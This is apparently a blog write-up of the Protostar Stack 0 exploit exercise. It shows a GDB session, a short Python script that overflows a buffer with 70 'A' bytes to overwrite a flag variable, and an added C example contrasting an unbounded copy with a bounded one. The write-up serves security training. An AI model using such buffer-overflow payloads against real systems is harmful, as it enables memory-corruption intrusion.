[ExpDev] Exploit Exercise | Protostar | Stack 0

What is Protostar?


Stack 0

Things to note

GDB (GNU Project Debugger)

$ gdb -q stack0                      # -q (quiet mode)
Reading symbols from /opt/protostar/bin/stack0...done.
(gdb) set disassembly-flavor intel # Intel Syntax (Who uses AT&T?)
(gdb) disas main # Disassembling main func
(gdb) break * 0x08048411              # Addr right above test
(gdb) run # Running the program
Breakpoint 1, main (argc=1, argv=0xbffff854) at stack0/stack0.c:13
13 in stack0/stack0.c
(gdb) x/2i $eip # Querying next 2 instructions
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x8048415 <main+33>: test eax,eax
(gdb) si # Single step instruction
0x08048415 13 in stack0/stack0.c
(gdb) info registers # Checking current registers
eax 0x0 0 <-- EAX is 0 (as modified = 0;)
ecx 0xbffff75c -1073744036
(gdb) set $eax = 0x1 # Changing EAX to 0x1
(gdb) continue
you have changed the 'modified' variable <-- Win!
Program exited with code 051.

BOF Exploit

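#!/usr/bin/python
# Python 2 syntax (print statement)
padding = 'A' * 70   # more bytes than the buffer holds, so the write spills into 'modified'
print padding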
python exp.py > exploit
./stack0 < /tmp/stack0/exploit
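
Why the 70 bytes of padding flip 'modified', and what a length-checked read changes, shown as an added example (not code from the original post or from Protostar). The 64-byte buffer size, the struct standing in for the stack layout, and all function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 64   /* assumed buffer size; not stated on this page */

/* Stand-in for the two locals as they sit in memory: buffer, then the flag. */
struct frame {
    char buffer[BUF_LEN];
    int  modified;
};

/* gets()-style copy: the length comes from the input, not from the buffer.
   Capped at sizeof(struct frame) only so this model stays inside its own object. */
int unbounded_copy(const char *in, size_t n)
{
    struct frame f;
    memset(&f, 0, sizeof f);                  /* modified = 0 */
    if (n > sizeof f) n = sizeof f;
    memcpy((unsigned char *)&f, in, n);       /* runs past buffer[] into modified */
    return f.modified != 0;
}

/* Hardened form: the length comes from the buffer, as fgets(buf, sizeof buf, stdin) does. */
int bounded_copy(const char *in, size_t n)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    if (n > sizeof f.buffer - 1) n = sizeof f.buffer - 1;
    memcpy(f.buffer, in, n);
    f.buffer[n] = '\0';
    return f.modified != 0;
}

/* Feeds n bytes of 'A' (exp.py sends 70) to either copy; returns 1 if modified changed. */
int feed_padding(size_t n, int hardened)
{
    char in[128];
    if (n > sizeof in) n = sizeof in;
    memset(in, 'A', n);
    return hardened ? bounded_copy(in, n) : unbounded_copy(in, n);
}

int main(void)
{
    printf("unbounded, 64 bytes: modified changed = %d\n", feed_padding(64, 0));
    printf("unbounded, 65 bytes: modified changed = %d\n", feed_padding(65, 0));
    printf("unbounded, 70 bytes: modified changed = %d\n", feed_padding(70, 0));
    printf("bounded,   70 bytes: modified changed = %d\n", feed_padding(70, 1));
    return 0;
}
```
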

Next challenge:
